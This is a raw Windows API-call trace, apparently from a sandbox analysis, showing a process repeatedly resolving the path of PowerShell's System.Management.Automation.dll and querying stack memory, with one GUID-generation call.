	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.018] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.018] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.019] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.020] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.021] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.021] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.022] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.023] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.023] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.024] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7b7d629b, Data2=0x3b6a, Data3=0x4624, Data4=([0]=0xbf, [1]=0xa9, [2]=0x18, [3]=0xcd, [4]=0xd3, [5]=0x60, [6]=0xb5, [7]=0x62))) returned 0x0
	[0402.024] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.024] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.024] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.025] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.025] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.026] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.026] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
